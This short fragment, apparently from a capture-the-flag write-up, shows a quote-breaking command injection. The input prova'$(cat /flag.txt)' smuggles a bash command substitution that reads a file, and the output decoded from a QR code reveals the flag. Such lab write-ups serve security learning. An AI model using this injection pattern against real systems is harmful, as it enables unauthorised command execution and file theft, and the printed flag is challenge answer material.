using ' We can escape the command and inject bash code.
INPUT: prova'$(cat /flag.txt)'
OUTPUT (from the decoded qr): provaoffsec{qr_dr0p_qu0t3_br34k_booPPFJAAhS0QtOb}